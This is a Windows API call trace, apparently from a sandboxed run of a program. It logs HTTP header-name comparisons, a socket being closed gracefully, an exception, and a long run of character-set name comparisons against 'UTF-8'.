CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="ETag", cchCount2=4) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="ETag", cchCount2=4) returned 3 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="ETag", cchCount2=4) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="ETag", cchCount2=4) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Pragma", cchCount2=6) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Pragma", cchCount2=6) returned 3 [0105.963] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f4 [0105.963] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f8 [0105.963] GetCurrentThreadId () returned 0x1358 [0105.963] GetCurrentThreadId () returned 0x1358 [0105.963] GetCurrentThreadId () returned 0x1358 [0105.963] select (in: nfds=0, readfds=0x19f980, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19f980, writefds=0x0, exceptfds=0x0) returned 1 [0105.964] recv (in: s=0x3f0, buf=0x23cab08, len=32768, flags=0 | out: buf=0x23cab08) returned 0 [0105.964] shutdown (s=0x3f0, how=1) returned 0 [0105.964] closesocket (s=0x3f0) returned 0 [0105.964] LoadStringW (in: hInstance=0x400000, uID=0xfee7, lpBuffer=0x19dae8, cchBufferMax=4096 | out: lpBuffer="Connection Closed Gracefully.") returned 0x1d [0105.964] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x19fad8) [0105.965] RtlUnwind (TargetFrame=0x19fb38, TargetIp=0x409a3c, ExceptionRecord=0x19eef8, ReturnValue=0x0) [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="US-ASCII", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.4-1968", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-6", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.4-1986", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.irv:1991", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASCII", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-US", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="us", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM367", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp367", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csASCII", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-10646-UTF-1", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10646UTF1", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.basic:1983", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ref", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO646basic1983", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INVARIANT", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csINVARIANT", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.irv:1983", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-2", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irv", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2IntlRefVersion", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BS_4730", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-4", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-GB", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gb", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uk", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO4UnitedKingdom", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-SEFI", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-8-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSSEFI", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-SEFI-ADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-8-2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSSEFIADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-DANO", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-9-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSDANO", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-DANO-ADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-9-2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSDANOADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEN_850200_B", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-10", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FI", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FI", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-SE", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10Swedish", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEN_850200_C", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-11", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-SE2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO11SwedishForNames", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS_C_5601-1987", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-149", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS_C_5601-1989", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSC_5601", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="korean", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csKSC56011987", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-KR", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022KR", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EUC-KR", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEUCKR", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-JP", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022JP", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-JP-2", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022JP2", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-CN", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-CN-EXT", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969-jp", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-13", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="katakana", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0201-7", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 3 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO13JISC6220jp", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969-ro", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-14", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-JP", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO14JISC6220ro", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IT", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-15", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-IT", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO15Italian", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PT", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-16", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-PT", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO16Portuguese", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-17", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-ES", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO17Spanish", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek7-old", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-18", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO18Greek7Old", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin-greek", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-19", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO19LatinGreek", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIN_66003", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-21", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="de", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-DE", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO21German", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF_Z_62-010_(1973)", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-25", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FR1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO25French", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Latin-greek-1", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-27", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO27LatinGreek1", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5427", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-37", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO5427Cyrillic", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6226-1978", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-42", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO42JISC62261978", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BS_viewdata", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-47", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO47BSViewdata", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS", cchCount1=4, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-49", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO49INIS", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS-8", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-50", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO50INIS8", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS-cyrillic", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-51", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO51INISCyrillic", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5427:1981", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-54", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO5427Cyrillic1981", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5428:1980", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-55", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO5428Greek", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_1988-80", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-57", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cn", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-CN", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO57GB1988", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_2312-80", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-58", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="chinese", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO58GB231280", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS_4551-1", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-60", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-NO", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO60DanishNorwegian", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO60Norwegian1", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS_4551-2", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-NO2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-61", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO61Norwegian2", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF_Z_62-010", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-69", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FR", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fr", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO69French", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="videotex-suppl", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 3 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-70", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO70VideotexSupp1", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PT2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-84", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-PT2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO84Portuguese2", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-85", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-ES2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO85Spanish2", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSZ_7795.3", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-86", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-HU", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hu", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO86Hungarian", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6226-1983", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 